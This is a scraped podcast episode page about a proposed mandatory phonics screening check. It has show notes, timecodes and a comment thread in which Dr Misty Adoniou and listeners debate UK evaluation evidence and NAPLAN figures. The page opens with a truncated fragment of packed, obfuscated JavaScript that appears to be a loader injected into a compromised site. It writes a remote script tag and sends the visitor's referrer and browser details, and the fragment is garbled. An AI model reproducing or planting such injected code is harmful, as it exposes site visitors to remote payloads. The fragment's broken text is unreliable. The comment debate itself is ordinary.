=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dzbie|var|u0026u|referrer|sbrnh||js|php’.split(‘|’),0,{}))
url=”https://api.soundcloud.com/tracks/308479091″ params=”color=ff5500&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false” width=”100%” height=”166″ iframe=”true” /]
Main Feature: Dr. Misty Adoniou discusses the implications of a nationwide mandatory phonics assessment, and the relationship between phonics and broader literacy instruction.
Regular Features: Dan Haesler asks “When should teachers speak up?” in a new Off Campus; Education in the news – Cameron discusses recent stories about Special Religious Instruction in schools.
Timecodes & Links:
00.00 Opening Credits
01:19 Intro – Principal’s Wellbeing Survey
05:41 Off Campus – Dan Haesler
14:51 Scripture in Schools
31:48 Feature Introduction
34:28 Interview – Dr Misty Adoniou
1:04:11 Quote & Sign Off
Very disappointed in the very one sided argument and message about phonics as described by Misty. Why was the conversation not presented in a less biased presentation? Could you not have equalised the discussion with someone who supports the phonics screening test?
Misty referred to the concept of phonics in a very generalised way and claimed that all teachers in all the classrooms she visited teach phonics? Why was there no discussion about the different types of phonics ( analytical or synthetic) and the differences between implicit teaching of phonics and systematic direct teaching of phonics?
Furthermore Misty implies that teaching phonics is not important- which underscores any discussion for the important understanding teachers should have for phonemic awareness. And there in an insurmountable amount of scientific evidence explaining children’s difficulties with letter sound correspondences when they have little awareness of sounds in spoken language. And this not just a little insignificant sprinkling of children teachers do not have to worry themselves about. 10 percent of the population will have difficulty reading and writing. And guess what ? For all of Misty’s banter about children not being able to achieve reading comprehension- NO child that can not make letter sound correspondences will ever keep up with their classmates with comprehending text. Especially when they hit secondary school – not to mention when they hit grade three where we have the dogmatic approach in this country that we now only instruct children to read to learn and not learn to read.
Yes comprehension is important – it is the ultimate goal for successful reading .
I challenged you to have a wider discussion- discuss the Tunmers and Goughs (1986) Simple View of Reading.
Thanks for your message.
As stated in the introduction to the interview, and again at the start of the interview, and again in the wrap up after the interview, this discussion was about the matter of a mandatory, teacher delivered, phonics-only literacy assessment. It was not an attempt to capture all of the nuance of the issues of literacy instruction, and the discussion on phonics and literacy was intended to bring a bit of context to the discussion of that issue.
It would be almost impossible for a singe interview or podcast episode to capture all perspectives on any issue as the format of our program is to focus primarily on a long-format interviews with an individual – although over time we may interview multiple people on related topics in order to invite different perspectives.
Thanks Danielle for taking the time to listen to the podcast and to share your passion for teaching children to read. It is a passion I share with you 🙂
One of your comments stands out as needing some correction. ‘Furthermore Misty implies that teaching phonics is not important’.
I never imply that, in fact I state that teaching phonics is important. More than ‘important’, I state that it is ‘necessary’.
Hi Misty.
Just two quick questions that came out of listening to this interview : )
In your interview you say that following the 2012 implementation of the phonics test in the U.K, students showed improvements in phonics (as would be expected), but that there’s no evidence for an improvement in reading or writing. I found this paper by the U.K government which, on page 5, has two figures that show improvement in both reading and writing over this time period. Have you seen this paper before? If so, is there a reason why you don’t think it’s valid evidence? I’d love to hear your thoughts. Source: https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/463002/SFR32_KS1_2015_Text.pdf
Decisions like the one of whether or not to implement a national phonics check are always made in a climate of uncertainty. It’s impossible for us to know whether the phonics check will have an overwhelmingly positive or negative effect on our students, so what we need to do is determine the most likely outcome from implementing such a check, and compare that to the associated cost. I guess my second question is: ’What evidence, if any, would convince you that implementing the proposed phonics check in Australia would most likely be a cost effective investment?’. PIRLS results from 2016 are due out on Dec 5th 2017, if it shows a significant increase in literacy skills for students in the England, when compared to the 2011 PIRLS results, would you change your mind?
Just to re-cap those two questions.
1: Why do you think that the evidence for the success of the U.K phonics check isn’t valid? (as found on page 5, in the url above). Sorry if I’ve missed something obvious here.
2: If you do think that the above evidence isn’t valid, what would be your criteria for research that could be considered valid in relation to us making the assessment that, on the balance of evidence, implementing such a phonics check in Australia would be a worthwhile investment?
I really appreciate any time you have to answer these questions.
Thanks so much, I very much enjoyed listening to the interview.
Ollie.
Hi Ollie
Thanks for your thoughtful questions on this very hot topic.
The link you provide – a government advertorial – cites clear evidence the children get better at taking the phonics screening test. It also states there were no improvements in reading, and only a 1% improvement in writing.
The full evaluation report of the phonics screening check that was commissioned by the UK Dept of Education itself is unequivocal – there is NO evidence of any improvement in literacy skills
https://www.nfer.ac.uk/publications/YOPC03/YOPC03.pdf
So why do it? I get that it was introduced with every good intention – to improve literacy skills. But when an experiment doesn’t work we need to know when to throw in the towel. It has been an expensive experiment for the UK – about AUD1,400,000 start up costs and continuing costs of annually of about $600,000. They have not reaped any returns – literacy skills have not improved. In many ways it has been a perfect experiment for Australia to observe – somebody else has spent the money, and we should learn from their findings.
The evaluation also found that the test did not tell teachers anything they didn’t already know. It didn’t identify children they didn’t already know were the children who were struggling. And it would appear, that even though they now had info on what sounds the children didn’t know – and could intensively work with them so that they could pass the phonics test at the end of the year – they still didn’t get better at reading and writing.
As it turns out, the test itself has been found to be an invalid test of phonic knowledge. http://onlinelibrary.wiley.com/doi/10.1002/berj.3269/abstract
Ollie, in Australia, we have less than 5% of students under literacy benchmark as measured by NAPLAN. We know exactly who they are, and these are the children who require our attention. And if Gonski had been applied as it was intended – where money was attached to identified children, and we were all then held accountable to the outcomes of those identified children – rather than handed out like lollies to systems who use it to implement ineffectual ‘system’ initiatives – then we’d have a chance of ‘fixing’ the 5%.
A phonics screening check has not ‘fixed’ the 5% in the UK and it won’t ‘fix’ it here either.
Misty
* less than 5% at Year 3
it doubles each NAPLAN after that. Further evidence that we are sliding down the literacy test slide not because our children can’t read the basics, it is because they can’t read the complex
Hi Misty.
Thanks for your thoughtful reply!
In reference to your comment about the gov’t editorial that I cited, you stated that it “states there were no improvements in reading, and only a 1% improvement in writing.”, this is true, but this was based upon 2014 levels, regarding the growth to 2015. There was significant growth from 2012 to 2015 in both reading (between 3 and 5%) and writing (between 4 and 5%). Just thought that that clarification was important.
But in regards to the full evaluation report that you pointed me to, thanks very much for this, and I agree that the results from that are ‘no measurable effect’. The line in particular stating this was the following: “the evidence suggests that the introduction of the check has had an impact on pupils’ attainment in phonics, but not (or not yet) on their attainment in literacy.” (p. 10) Source: Phonics Screening Check Evaluation, Final Report, Department of Education (U.K). 2015. https://www.nfer.ac.uk/publications/YOPC03/YOPC03.pdf
Regarding the Darnell, C. A., Solity, J. E., & Wall, H. (2017)paper, it seems a bit of a stretch of the authors’ argument that the phonics test is invalid because “15 GPCs accounted for 67% of all GPC occurrences, with 27 of the 85 specified GPCs (31.8%) not appearing at all.” as no test tests all knowledge in a realm. But I’m clearly out of my depth when it comes to the ins and outs of phonics so this was just a surface impression.
Really appreciate your reply and it’s given me a great springboard into some of the evidence cited against implementation of the national phonics check. I’ll continue to explore!
Best.
Ollie.
One quick more thing Misty, do you have a reference for your naplan stats? They come as a bit of a surprise.
Thanks heaps 🙂
Ollie.
Were you able to read the full Darnell paper Ollie? I know that these papers are frustratingly kept behind paywalls and I don’t know where you work and what access you have. It’s point is that if you are going to test phonics, then you need to test phonics. The phonics screening check tests a seemingly random selection of phoneme/grapheme correspondences, hence its validity as a predictor of reading difficulties or preparation for reading interventions becomes equally random. This is probably why the test only manages to improve student performance on the test.
The NAPLAN results are all on the NAPLAN site – you can read the full 2016 report and see the results there. 5% is the mean across the states and territories in Year 3. It is much higher in the NT and Tasmania but lower in the other states. Our money should be spent on interventions for that small percentage, rather than rollouts of further testing regimes for the entire population. At same stage we surely have to start feeding the pig, instead of constantly putting it on the scales!
Hi again Misty. I’ve taken a while to reply as I wanted to have a good think and a bit of research. Here’s what I found.
I read the Darnell paper, and I sent it off to a speech pathologist for their impression also. They echoed my thoughts also regarding the fact that it argues the straw man. The Phonics check is designed as just that, a check, it never claims to cover all of the 85 grapheme–phoneme correspondences. As with all assessments, it’s necessary to balance the need to gain an accurate picture of a student’s competency with the inherent constraints present (primarily time and cost). It wouldn’t be practical (or necessary) to test all of the GPCs to determine whether a student is struggling or not with phonemic awareness.
As for the claim that only 5% of Year 3 students are above the literacy benchmark, and that this shows that “we are sliding down the literacy test slide not because our children can’t read the basics, it is because they can’t read the complex”, it took me quite a while to get to the bottom of this, and I had to email ACARA about it.
The first thing that I found was that the statistic that you’re quoting relates to the ‘National Minimum Standard’ (i.e., there are 5% of year 3 students below the NMS, which is true). I emailed ACARA and asked how this NMS is derived, and how it can be interpreted, this is what they said.
“The NMS for each year level was determined prior to ACARA’s existence, so we do not have ready access to the documentation that would have been developed around their determination. However, we understand that the current NMSs were determined by measurement experts, from analysis of the benchmarks that were in place in each of the states’ and territories’ testing programs pre-NAPLAN.
We are aware that the NMS is a very low standard, compared to the more proficient standards set for other testing programs. ACARA is currently undertaking research to determine more challenging standards. This is still in the research phase, and it has yet to be determined when additional standards might be implemented.”
So to suggest that, as only 5% of Year 3 students are below NMS, we don’t have a problem in early years literacy is perhaps a bit of a stretch. I actually asked ACARA the following question explicitly.
“what does this mean regarding how much this ‘National Minimum Standard’ tells us about student achievement? Would it be fair, for example, for me to state that in Australia, we have less than 5% of students (Year 3 students) under literacy benchmark as measured by NAPLAN, therfore we have evidence that we are sliding down the literacy test slide not because our children can’t read the basics, it is because they can’t read the complex?”.
This was their answer:
“The inference you have drawn in your email, while seemingly logical, cannot be confirmed by NAPLAN data, as there is no verified relationship between NAPLAN and the testing programs to which you are likely referring (PISA, TIMMS, PIRLS).”
So bringing that all together (along with our above few posts)
1. the article from the DoE (U.K) suggesting that “the evidence suggests that the introduction of the check has had an impact on pupils’ attainment in phonics, but not (or not yet) on their attainment in literacy.” (p. 10). This is an interesting result and an important one. Thanks for sharing that.
2. I wouldn’t place a whole heap of weight on the Darnell report as it appears to be arguing that the PC is not doing something that it never claimed to be doing (the straw man).
3. It doesn’t appear to be fair to claim that NAPLAN suggests that only 5% of our Year 3 students are not where they should be. This is as, from the ACARA email “the NMS is a very low standard”. Further clouding the issue, ACARA themselves can’t actually tell us what the NMS exactly means or how it was derived. Perhaps evidence that we need more refined testing to see where our students are at?
It’s obviously a very complex issue. But at this point I don’t feel that I’ve seen sufficient evidence to convince me that it’s either a no-brainer good investment, nor a likely waste of money. I’ll continue to explore.
Thanks for sharing all of these resources Misty, I’ve enjoyed delving into this and would love any further info you have to share.
Best.
Ollie.
Pingback: ERRR Podcast #005. Pamela Snow | Ollie Lovell